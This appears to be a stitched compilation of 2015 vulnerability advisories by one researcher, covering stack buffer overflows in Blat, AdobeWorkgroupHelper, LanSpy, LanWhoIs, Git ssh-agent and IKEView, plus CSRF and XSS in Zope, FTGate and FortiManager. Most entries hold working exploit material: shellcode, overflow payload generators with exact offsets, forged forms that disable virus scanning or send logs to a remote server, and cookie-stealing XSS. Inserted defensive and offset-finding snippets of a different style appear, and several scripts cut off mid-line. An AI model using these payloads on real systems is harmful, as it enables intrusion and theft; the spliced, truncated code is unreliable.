http://sourceforge.net/projects/blat/



Product:

Blat v2.7.6

blat.exe is a Win32 command line eMail tool that sends eMail using SMTP or posts to usenet using NNTP.


Vulnerability Type:
=
Stack Buffer Overflow


CVE Reference:
==
N/A




Vulnerability Details:
=
An older release of blat.exe v2.7.6 is prone to a stack based buffer overflow when sending malicious command line arguments; we need to send two arguments, the first can be whatever e.g. "" and the second argument triggers the buffer overflow and executes arbitrary code on the victim's OS.


Stack dump...


EAX 0826
ECX 0018E828 ASCII "Blat saw and processed these options, and was confused by 
the last one...
 AAA...
EDX 0008E3C8
EBX 00E1
ESP 0018F05C ASCII "A...
EBP 41414141
ESI 00426E88 blat.00426E88
EDI 00272FD8
EIP 41414141   <-- BOOM!

C 0  ES 002B 32bit 0()
P 1  CS 0023 32bit 0()
A 0  SS 002B 32bit 0()
Z 1  DS 002B 32bit 0()
S 0  FS 0053 32bit 7EFDD000(FFF)
T 0  GS 002B 32bit 0()
D 0
O 0  LastErr ERROR_SUCCESS ()
EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)



Exploit code(s):
===

Python script to exploit...


import struct,os,subprocess


#pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")

vulnpgm="C:\\blat276\\full\\blat.exe "
eip=struct.pack('

AdobeWorkgroupHelper Stack Based Buffer Overflow

2015-10-13 Thread apparitionsec
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/AS-ADOBE-WRKGRP-BUFFER-OVERFLOW.txt



Vendor:

www.adobe.com



Product:
=
AdobeWorkgroupHelper.exe v2.8.3.3 
Part of Photoshop 7.0 circa 2002



Vulnerability Type:
===
Stack Based Buffer Overflow



CVE Reference:
==
N/A




Vulnerability Details:
=

AdobeWorkgroupHelper.exe is a component of the Photoshop 7 workgroup functionality that lets users work with files on a server that is registered as a workgroup. If AdobeWorkgroupHelper.exe is called with an overly long command line argument it is vulnerable to a stack based buffer overflow exploit. 

Resulting in arbitrary code execution undermining the integrity of the program. We can control the EIP register at about 5,856 bytes; our shellcode will point to the ECX register.

Tested successfully on Windows 7 SP1



Exploit code(s):
===

Use below python script to exploit...


import struct,os,subprocess

#Photoshop 7 AdobeWorkgroupHelper.exe buffer overflow exploit
#Tested Windows 7 SP1
#
#by hyp3rlinx - apparition...@gmail.com
#hyp3rlinx.altervista.org
#==
#
#0x618b19f7 : call ecx |  {PAGE_EXECUTE_READ} [ARM.dll]
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.8.3.3
#(C:\Program Files (x86)\Common Files\Adobe\Workflow\ARM.dll)
#===

'''
Quick Register dump...

EAX 00270938
ECX 00270A7C <---BOOM!
EDX 00A515FC ASCII "AA..."
EBX 41414140
ESP 0018FEB0
EBP 0018FED0
ESI 
EDI 41414141
EIP 004585C8 AdobeWor.004585C8
C 0  ES 002B 32bit 0()
P 0  CS 0023 32bit 0()
A 0  SS 002B 32bit 0()
Z 0  DS 002B 32bit 0()
S 0  FS 0053 32bit 7EFDD000(FFF)
T 0  GS 002B 32bit 0()
D 0
O 0  LastErr ERROR_SUCCESS ()
EFL 00010202 (NO,NB,NE,A,NS,PO,GE,G)

'''


#shellcode to pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")

vulnpgm="C:\Program Files (x86)\Common Files\Adobe\Workflow\AdobeWorkgroupHelper.exe "

#payload="A"*5852+"R"*4  #< control EIP register

#our shellcode will point at ECX register, so we need to find a JMP or CALL ECX and point EIP to that address
#where our malicious code resides, we find it in ARM.dll

eip=struct.pack('

Zope Management Interface CSRF vulnerabilities

2015-10-07 Thread apparitionsec
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/AS-ZOPE-CSRF.txt



Vendor:

www.zope.org
plone.org



Product:

Zope Management Interface 4.3.7

Zope is a Python-based application server for building secure and highly scalable web applications. Plone is a Content Management System built on top of the open source application server Zope and the accompanying Content Management Framework. 


Vulnerability Type:
===
Cross site request forgery (CSRF)

Multiple CSRF (cross-site request forgery) vulnerabilities in the ZMI (Zope 
Management Interface).
Patches to Zope and Plone for multiple CSRF issues.

https://plone.org/security/20151006/multiple-csrf-vulnerabilities-in-zope
https://plone.org/products/plone/security/advisories/security-vulnerability-20151006-csrf



CVE Reference:
==
NA



Vulnerability Details:
=

Security vulnerability: 20151006 - CSRF 
ZMI is mostly unprotected from CSRF vulnerabilities.

Versions affected

4.3.7, 4.3.6, 4.3.5, 4.3.4, 4.3.3, 4.3.2, 4.3.1, 4.3, 4.2.7, 4.2.6, 4.2.5, 
4.2.4, 4.2.3, 4.2.2, 4.2.1, 4.2
4.1.6, 4.1.5, 4.1.4, 4.1.3, 4.1.2, 4.1.1, 4.1, 4.0.9, 4.0.7, 4.0.5, 4.0.4, 
4.0.3, 4.0.2, 4.0.1, 4.0, 3.3.6
3.3.5, 3.3.4. 3.3.3, 3.3.2, 3.3.1, 3.3

All versions of Plone prior to 5.x are vulnerable.


Fixed by
Nathan Van Gheem, of the Plone Security Team
Coordinated by Plone Security Team

patch was released and is available from 
https://pypi.python.org/pypi/plone4.csrffixes


Exploit code(s):
===




Plone CSRF Add Linxs & Persistent XSS




function doit(){
var e=document.getElementById('HELL')
e.submit()
}


 http://localhost:8080/Plone/Members/portal_factory/Link/link.2015-08-30.66/atct_edit;>
  
  http://hyp3rlinx.altervista.org; size="30" maxlength="511" 
placeholder="" />
  
  



2) CSRF to Persistent XSS -  Zope Management Interface 
++

Persistent XSS via CSRF on title change properties tab, this will execute on 
each Zope page accessed by users.

CSRF to Persistent XSS POC Code:
=

http://localhost:8080/; method="post">


Disclosure Timeline:
=
Vulnerability reported: 2015-08-30
Hotfix released: 2015-10-06



Exploitation Technique:
===
Remote
Vector  NETWORK
Complexity  LOW
Authentication  NONE
Confidentiality NONE
Integrity   PARTIAL
AvailabilityPARTIAL


Severity Level:
=
6.4 – MEDIUM



Description:
==


Request Method(s):  [+]  POST


Vulnerable Product: [+]  Zope Management Interface & all versions 
of Plone prior to 5.x are vulnerable.


===


by hyp3rlinx


LanWhoIs.exe 1.0.1.120 Stack Buffer Overflow

2015-10-06 Thread apparitionsec
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/AS-LANWHOIS-BUFFER-OVERFLOW-10062015.txt



Vendor:

www.lantricks.com



Product:

LanWhoIs.exe 1.0.1.120

LanWhoIs queries and returns domain (site) holder or IP address information.


Vulnerability Type:
===
Buffer Overflow



CVE Reference:
==
N/A



Vulnerability Details:
==

LanWhoIs contains a file parsing stack buffer overflow vulnerability. The program has a whois_result.xml XML file located under the LanWhoIs directory. This file holds results returned from program queries. 

e.g.


  
216.239.37.99
whois.arin.net
02.01.2005 16:17:30
-1
 
We can exploit the program by injecting a malicious payload into the  node of the local XML file, causing a buffer overflow overwriting both pointers to the NSEH & SEH exception handlers & controlling EIP at about 676 bytes.

e.g.

A.shellcode...etc..


WinDbg stack dump

(2048.17cc): Access violation - code c005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** WARNING: Unable to verify checksum for image0040
*** ERROR: Module load completed but symbols could not be loaded for 
image0040
eax=02bdfec8 ebx=02bdff14 ecx=02bdfecc edx=41414141 esi= edi=
eip=00404bc8 esp=02bdfc04 ebp=02bdfecc iopl=0 nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b efl=00010206

image0040+0x4bc8:
00404bc8 8b4af8  mov ecx,dword ptr [edx-8] ds:002b:41414139=
0:011> !exchain
02bdfed4: 52525252
Invalid exception stack at 42424242

registers...

EAX 
ECX 52525252
EDX 7714B4AD ntdll.7714B4AD
EBX 
ESP 04D0F668
EBP 04D0F688
ESI 
EDI 
EIP 52525252


POC code:
==

Run the script below, then copy and insert the POC payload into the  XML node and run the application. Next, select the address in the Results window pane and then click the Query button to run a whois lookup, or use the 'F3' keyboard cmd to execute, and KABOOOM!!!


file=open("C:\\Program Files (x86)\\LanTricks\LanWhoIs\\HELL","w")
payload="A"*676+""+"" 
<#KABOOM!!!
file.write(payload)
file.close()



Public Disclosure:
===
October 6, 2015  




Exploitation Technique:
===
Local
Tested on Windows 7 SP1



Vulnerable Parameter:
==
QueryString




===


by hyp3rlinx


LanSpy 2.0.0.155 Buffer Overflow

2015-10-05 Thread apparitionsec
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/AS-LANSPY-BUFFER-OVERFLOW-10052015.txt



Vendor:

www.lantricks.com



Product:

LanSpy.exe 

LanSpy is a network security and port scanner which allows getting different information about a computer: Domain and NetBios names, MAC address, Server information, Domain and Domain controller etc


Vulnerability Type:
===
Buffer Overflow



CVE Reference:
==
N/A



Vulnerability Details:
==

LanSpy.exe reads an 'addresses.txt' plain text file that lives under the main
LanSpy directory; the file is used to load the IPs or URLs to be scanned,

e.g.

127.0.0.1

Replace addresses.txt with our malicious one; the buffer overflow payload must
be the very first entry in the text file. Next, run LanSpy.exe and click the
green arrow (or press 'F3') to start. Then KABOOM!... the program crashes and we
control EIP at 684 bytes, also overwriting both the nSEH & SEH exception handler
pointers...

Quick stack dump...

(1274.19c4): Access violation - code c005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.

eax=0264fb41 ebx=00418d7c ecx=0264fe84 edx= esi= edi=
eip=41414141 esp=0264fe8c ebp=41414141 iopl=0 nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b efl=00010246
41414141 ??  ???
0:001> g

(1274.19c4): Access violation - code c005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax= ebx= ecx=52525252 edx=7714b4ad esi= edi=
eip=52525252 esp=0264f8f0 ebp=0264f910 iopl=0 nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b efl=00010246
52525252 ??  ???
0:001> !exchain
0264f904: ntdll!LdrRemoveLoadAsDataTable+d64 (7714b4ad)
0264fe8c: 52525252
Invalid exception stack at 42424242



POC code(s):
=

# LanSpy.exe buffer overflow POC
# by hyp3rlinx
# hyp3rlinx.altervista.org
# =

# LanSpy.exe uses an 'addresses.txt' text file
# which lives under the LanSpy directory;
# the addresses.txt file is used to load scanned IPs or URLs

# control EIP at 684 bytes... also overwrite
# both the NSEH & SEH exception handler pointers
# (nSEH/SEH bytes reconstructed from the crash dump above:
#  next SEH record = 42424242 "BBBB", SE handler = 52525252 "RRRR")
# ---

nseh = "B" * 4
seh = "R" * 4
payload = "A" * 684 + nseh + seh  # <--- KABOOM!

with open("C:\\Program Files (x86)\\LanTricks\\LanSpy\\addresses.txt", "w") as f:
    f.write(payload)




Public Disclosure:
===
October 5, 2015  




Exploitation Technique:
===
Local




===

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere.

by hyp3rlinx


FTGate 2009 Build 6.4.00 CSRF Vulnerabilities

2015-10-05 Thread apparitionsec
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/AS-FTGATE-2009-CSRF.txt



Vendor:

www.ftgate.com



Product:

FTGate 2009 SR3 May 13 2010 Build 6.4.00


Vulnerability Type:
=
Cross site request forgery (CSRF)


CVE Reference:
==
N/A




Vulnerability Details:
=
Multiple CSRF vectors exist within FTGate 2009 that allow us to add arbitrary 
remote domains,
disable antivirus scanning for various Email file attachment types, and finally 
change settings
to have archived server logs sent to our remote attacker controlled server for 
safe keeping.

Exploit code(s):
===

CSRF(s):

<script>
function invertedcross(){
var e=document.getElementById('PUNKSNOTDEAD')
e.submit()
}
</script>


1) add arbitrary domains:
-
<form id="PUNKSNOTDEAD" action="http://localhost:8089/webadmin/mailboxes/index.fts?action=save" method="post">

</form>


2) sends archived logs to arbitrary remote server:
--
<form id="PUNKSNOTDEAD" action="http://localhost:8089/webadmin/config/archive.fts?action=save" method="post">

</form>


3) disable virus scan for .jar or .exe files etc:
-
The 'Virus Scanning Mode' option controls the operating mode of the virus
scanner for email attachments; mode=0 disables virus scanning.

<form id="PUNKSNOTDEAD" action="http://localhost:8089/webadmin/filters/virus.fts" method="post">

</form>


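What separates the three forced forms above from a legitimate administrator
request is only where the submission came from and the absence of anything a
cross-site page cannot obtain. The check below is an added example of how the
FTGate save endpoints could reject them; it is not FTGate code. The origin
http://localhost:8089 and the parameter names (domadd, extarcserver, mode) come
from the advisory; the session layout, the function names (new_session,
check_csrf) and the request contents are assumptions made for the demo.

```python
# Added example, not FTGate code: origin check plus synchronizer token for a
# state-changing POST endpoint such as /webadmin/config/archive.fts?action=save.
import hmac
import secrets
from urllib.parse import urlsplit

SITE_ORIGIN = "http://localhost:8089"   # the webadmin origin used in the PoCs
SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}


def new_session():
    """Per-login session carrying the token that every admin form must echo back."""
    return {"user": "admin", "csrf_token": secrets.token_urlsafe(32)}


def _header(headers, name):
    """Case-insensitive header lookup (header dicts are constructed in the demo)."""
    for key, value in headers.items():
        if key.lower() == name.lower():
            return value
    return None


def check_csrf(method, headers, form, session, site_origin=SITE_ORIGIN):
    """Return (allowed, reason). Two independent checks for unsafe methods:
    the browser-set Origin (or Referer) must equal our origin, failing closed
    when both are absent, and the form must carry the session's token."""
    if method.upper() in SAFE_METHODS:
        return True, "safe method"
    source = _header(headers, "Origin") or _header(headers, "Referer")
    if not source:
        return False, "no Origin/Referer header"
    parts = urlsplit(source)
    src_origin = f"{parts.scheme}://{parts.netloc}"
    if src_origin != site_origin:
        return False, f"cross-origin request from {src_origin}"
    expected = session.get("csrf_token") or ""
    provided = form.get("csrf_token") or ""
    if not expected or not hmac.compare_digest(expected, provided):
        return False, "missing or invalid CSRF token"
    return True, "ok"


if __name__ == "__main__":
    session = new_session()
    # The forced request from the advisory: the admin's browser posts from the
    # attacker's page, so Origin is the attacker's site and no token is sent.
    forged = {"extarcserver": "attacker.example"}          # constructed value
    print(check_csrf("POST", {"Origin": "http://attacker.example"}, forged, session))
    # A real admin page is same-origin and includes the token.
    legit = {"mode": "1", "csrf_token": session["csrf_token"]}
    print(check_csrf("POST", {"Origin": SITE_ORIGIN}, legit, session))
```

The Origin comparison is a full scheme+host+port match, so a lookalike such as
localhost:8089.attacker.example is rejected, and a missing header fails closed
rather than open. The token is compared with hmac.compare_digest to avoid a
timing side channel.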

Disclosure Timeline:
=
Vendor Notification: September 29, 2015 
October 1, 2015 : Public Disclosure




Exploitation Technique:
===
Remote



Severity Level:
=
High




Description:
==


Request Method(s):  [+]  POST


Vulnerable Product: [+]  FTGate 2009 SR3 May 13 2010 Build 6.4.00


Vulnerable Parameter(s):[+]  domadd, extarcserver & mode



===

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere.

by hyp3rlinx


Git-1.9.5 ssh-agent.exe Buffer Overflow

2015-09-28 Thread apparitionsec
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/AS-GIT-SSH-AGENT-BUFF-OVERFLOW.txt



Vendor:

git-scm.com



Product:

Git-1.9.5-preview20150319.exe
github.com/msysgit/msysgit/releases/tag/Git-1.9.5-preview20150319


Vulnerability Type:
===
Buffer Overflow



CVE Reference:
==
N/A



Vulnerability Details:
=
The ssh-agent.exe shipped with Git for Windows (msysgit) is vulnerable to a buffer
overflow. Under the cmd directory in Git there is a start-ssh-agent.cmd file used
to invoke ssh-agent.exe. This is a local attack vector: if the "start-ssh-agent.cmd"
file is replaced with a specially crafted malicious '.cmd' file, we cause a buffer
overflow, and code execution may become possible.

Fault module seems to be msys-1.0.dll

File Name: msys-1.0.dll
MD5: 39E779952FF35D1EB3F74B9C36739092
APIVersion: 0.46

Stack trace:
-
MSYS-1.0.12 Build:2012-07-05 14:56
Exception: STATUS_ACCESS_VIOLATION at eip=41414141
eax= ebx=0028FA3C ecx=680A4C3A edx=680A4C3A esi=0028FA2C edi=1DAC
ebp=42424242 esp=0028F9B4 program=C:\Program Files (x86)\Git\bin\ssh-agent.exe
cs=0023 ds=002B es=002B fs=0053 gs=002B ss=002B


Payload of 944 bytes to cause seg fault:
@ 948 bytes we completely overwrite EBP register.
@ 972 bytes KABOOM! we control EIP.


Quick GDB dump...

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info r
eax0x   -1
ecx0x680a4c3a   1745505338
edx0x680a4c3a   1745505338
ebx0x28f90c 2685196
esp0x28f884 0x28f884
ebp0x41414141   0x41414141
esi0x28f8fc 2685180
edi0x2660   9824
eip0x41414141   0x41414141
eflags 0x10246  [ PF ZF IF RF ]
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x53 83
gs 0x2b 43



POC code(s):
===

The Python script below creates a malicious batch file in the Git/bin directory,
named 'ssh_agent_hell.cmd' here in place of 'start-ssh-agent.cmd'; once run it
causes the buffer overflow and overwrites EIP.

Save the following as ssh-agent-eip.py or whatever, run the script to generate
the malicious '.cmd' file and run it!

import shutil

# Git ssh-agent.exe
# EIP overwrite at 972 bytes
# By hyp3rlinx
# ==

file = "C:\\Program Files (x86)\\Git\\bin\\ssh_agent_hell"
payload = "CALL ssh-agent.exe "

# 972-byte argument: the 'B' filler overwrites EBP (42424242, reached at
# byte 948) and the last 4 'A' bytes land in EIP (41414141 at byte 972)
eip = "A" * 4
payload += "B" * 968 + eip

with open(file, "w") as x:
    x.write(payload)

# give it the .cmd extension so the Windows shell runs it as a batch file
shutil.move(file, file + ".cmd")

print("Git ssh-agent.exe buffer overflow POC\n")
print("ssh_agent_hell.cmd file created!...\n")
print("by hyp3rlinx")
print("\n")




Disclosure Timeline:
=
Vendor Notification:  August 10, 2015
Sept 26, 2015  : Public Disclosure




Exploitation Technique:
===
Local



Description:
==
Vulnerable Product: [+]  Git-1.9.5-preview20150319.exe



===

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere.

by hyp3rlinx


FortiManager v5.2.2 Multiple XSS Vulnerabilities

2015-09-25 Thread apparitionsec
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/AS-FORTIMANAGER-XSS-0924.txt



Vendor:

www.fortinet.com



Product:

FortiManager v5.2.2

FortiManager is a centralized security management appliance that allows you to
centrally manage any number of Fortinet Network Security devices.


Vulnerability Type:
===
Multiple Cross Site Scripting ( XSS ) in FortiManager GUI
http://www.fortiguard.com/advisory/multiple-xss-vulnerabilities-in-fortimanager-gui



CVE Reference:
==
Pending





Vulnerability Details:
=

The Graphical User Interface (GUI) of FortiManager v5.2.2 is 
vulnerable to two reflected Cross-Site Scripting (XSS) vulnerabilities.
2 potential XSS vectors were identified:

* XSS vulnerability in SOMVpnSSLPortalDialog.
* XSS vulnerability in FGDMngUpdHistory.

The Graphical User Interface (GUI) of FortiManager v5.2.3 is vulnerable to one
reflected XSS vulnerability and one stored XSS vulnerability.
2 potential XSS vectors were identified:

* XSS vulnerability in sharedjobmanager.
* XSS vulnerability in SOMServiceObjDialog.

Affected Products

XSS items 1-2: FortiManager v5.2.2 or earlier.
XSS items 3-4: FortiManager v5.2.3 or earlier.


Solutions:
===
No workarounds are currently available.
Update to FortiManager v5.2.4.


Exploit code(s):
===

1- Persistent:
https://localhost/cgi-bin/module/sharedobjmanager/firewall/SOMServiceObjDialog?devGrpId=18446744073709551615=18446744073709551615==3=0=ems=167=0=ALL=167=167_w=1=189=0=50

<script>alert(666)</script>   (submitted in the dialog's textarea field)


2- Reflected
https://localhost/cgi-bin/module/sharedobjmanager/policy_new/874/PolicyTable?vdom=%22%27/%3E%3C/script%3E%3Cscript%3Ealert%28%27[XSS%20FortiManager%20POC%20VM64%20v5.2.2%2008042015%20]\n\n%27%2bdocument.cookie%29%3C/script%3E



Disclosure Timeline:
=
Vendor Notification:  August 4, 2015
September 24, 2015 : Public Disclosure




Exploitation Technique:
===
Remote & Local



Severity Level:
=
Medium (3)




Description:
==


Request Method(s):  [+] GET


Vulnerable Product: [+] FortiManager v5.2.2  & v5.2.3 or earlier


Vulnerable Parameter(s):[+] vdom, textarea field


Affected Area(s):   [+] sharedobjmanager, SOMServiceObjDialog


===

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere.

by hyp3rlinx


Microsoft Exchange Information Disclosure

2015-09-16 Thread apparitionsec
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/AS-MS-EXCHANGE-INFO-DISCLOSURE.txt



Vendor:

www.microsoft.com



Product:

Microsoft Exchange Outlook Web


Vulnerability Type:
===
Information Disclosure


CVE Reference:
==
CVE-2015-2505
http://www.securitytracker.com/id/1033495




Vulnerability Details:
=
Microsoft Exchange Outlook Web Access Lets Remote Users Obtain Potentially 
Sensitive Information

Fix Available:  Yes  Vendor Confirmed:  Yes  
Version(s): 2013 SP1, 2013 Cumulative Update 8, 2013 Cumulative Update 9

A remote user can obtain potentially sensitive information on the target 
system. 
Outlook Web Access (OWA) does not properly handle web requests. A remote user 
can send a specially crafted request to the target web application to view 
potentially sensitive stack trace information on the target system 
[CVE-2015-2505].



Exploit code(s):
===
N/A



Disclosure Timeline:
=
Vendor Notification: April 10, 2015
Sept 8, 2015  : Public Disclosure



[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere.

by hyp3rlinx


IKEView.exe R60 Stack Buffer Overflow

2015-09-14 Thread apparitionsec
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/AS-IKEVIEWR60-0914.txt



Vendor:

www.checkpoint.com
http://pingtool.org/downloads/IKEView.exe



Product:
==
IKEView.exe Feature Pack NGX R60 - Build 59104

IKEView.exe is used to inspect Internet Key Exchange (IKE) phase 1 & 2 packets
exchanged between the firewall and its VPN peer gateways.

IKEVIEW is a Checkpoint Partner tool available for VPN troubleshooting purposes.
It is a Windows executable that can be downloaded from Checkpoint.com. 
This file parses the IKE.elg file located on the firewall.

To use IKEVIEW for VPN troubleshooting do the following:

1. From the checkpoint firewall type the following:

vpn debug ikeon

This will create the IKE.elg file located in $FWDIR/log


2. Attempt to establish the VPN tunnel. All phases of the connection will be 
logged to the IKE.elg file.


3. SCP the file to your local desktop.
WINSCP works great

4. Launch IKEVIEW and select File>Open. Browse to the IKE.elg file.




Vulnerability Type:
==
Stack Buffer Overflow



CVE Reference:
==
N/A



Vulnerability Details:
=
IKEView.exe is vulnerable to a local stack based buffer overflow when parsing a
malicious (Internet Key Exchange) ".elg" file.
The vulnerability causes nSEH & SEH pointer overwrites at 4432 bytes after
IKEView parses our malicious file, which may result in arbitrary attacker
supplied code execution.


0018F868  |41414141  
0018F86C  |01FC56D0  ÐVü  ASCII "File loaded in 47 minutes, 00 seconds."
0018F870  |41414141  
0018F874  |41414141    Pointer to next SEH record
0018F878  |42424242    SE handler
0018F87C  |0002   ...


Quick Buffer Overflow POC :
===


1) Save the Python below as a .py file and run it; it generates the POC file.
Open it in IKEView.exe and KABOOM!

# IKEView R60 .elg buffer overflow POC
# by hyp3rlinx
seh = "B" * 4  # <-- overwrites the SE handler with 42424242 (hex for ASCII 'B')

file = "C:\\IKEView-buffer-overflow.elg"
# 4432 bytes total: the last 4 'A' of the filler land in the next-SEH record
# (41414141), the 4 'B' at offset 4428 land in the SE handler
payload = "A" * 4428 + seh
with open(file, "w") as x:
    x.write(payload)

print("\n===\n")
print(" IKEView-buffer-overflow.elg file created\n")
print(" hyp3rlinx ...")
print("=\n")



Exploitation Technique:
===
Local



Severity Level:
=
High



Description:
==


Vulnerable Product: [+] IKEView.exe Feature Pack NGX R60 - Build 
59104


Vulnerable File Type:   [+] .elg


Affected Area(s):   [+] Local OS


===

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere.

by hyp3rlinx


IKEView.exe Fox beta 1 Stack Buffer Overflow

2015-09-11 Thread apparitionsec
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/AS-CP_IKEVIEW-0911.txt



Vendor:

www.checkpoint.com



Product:

IKEView.exe Fox beta 1

IKEView.exe is used to inspect Internet Key Exchange (IKE) phase 1 & 2 packets
exchanged between the firewall and its VPN peer gateways.



Vulnerability Type:
==
Stack Buffer Overflow



CVE Reference:
==
N/A



Vulnerability Details:
=
IKEView.exe is vulnerable to a local stack based buffer overflow when parsing a
malicious (Internet Key Exchange) ".elg" file.
The vulnerability causes nSEH & SEH pointer overwrites at 4448 bytes after
IKEView parses our malicious file, which may result in arbitrary attacker
supplied code execution.


quick GDB register dump: 


EAX  
ECX 41414141 
EDX 7774B4AD ntdll.7774B4AD 
EBX  
ESP 0018E0E0 
EBP 0018E100 
ESI  
EDI  
EIP 41414141 
C 0 ES 002B 32bit 0() 
P 1 CS 0023 32bit 0() 
A 0 SS 002B 32bit 0() 
Z 1 DS 002B 32bit 0() 
S 0 FS 0053 32bit 7EFDD000(FFF) 
T 0 GS 002B 32bit 0() 
D 0 
O 0 LastErr ERROR_SUCCESS ()

---SEH Chain-

0:000> !exchain
0018f870: 42424242
Invalid exception stack at 41414141
0:000> 
0018f870: 42424242
Invalid exception stack at 41414141
0:000> 

0018F868  |02004AE0  àJ.  ASCII "File loaded in 08 minutes, 01 seconds."
0018F86C  |41414141  
0018F870  |41414141    Pointer to next SEH record
0018F874  |42424242    SE handler


Quick Buffer Overflow POC :
===


1) Save the Python below as a .py file and run it; it generates the POC file.
Open it in IKEView.exe and KABOOM!

# IKEView Fox beta 1 .elg buffer overflow POC
# by hyp3rlinx
seh = "B" * 4  # <-- overwrites the SE handler with 42424242 (hex for ASCII 'B')

file = "C:\\IKEView-buffer-overflow.elg"
# 4448 bytes total (the offset given above): the filler fills the next-SEH
# record with 41414141 and the trailing 4 'B' land in the SE handler
payload = "A" * (4448 - 4) + seh
with open(file, "w") as x:
    x.write(payload)

print("\n===\n")
print(" IKEView-buffer-overflow.elg file created\n")
print(" hyp3rlinx ...")
print("=\n")
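The LanSpy, Git ssh-agent and both IKEView advisories above each report a fixed
offset (684, 972, 4432 and 4448 bytes) at which the filler reaches EIP, EBP or
the nSEH/SEH pair. The script below is an added example, not code from these
advisories, showing how such offsets are located in practice: replace the
"A"*N filler with a cyclic pattern, read the overwritten register or SEH chain
values from the debugger, and look them up in the pattern. The crash values in
the demo are constructed, and the helper names (cyclic_pattern, pattern_offset,
crash_offsets, build_payload) are this example's own.

```python
# Added example (not from the advisories): cyclic pattern generator and offset
# locator for turning a crash register value into the exact input offset.
from itertools import product
import string


def cyclic_pattern(length):
    """Return `length` bytes of the Aa0Aa1Aa2... pattern. Every 4-byte window
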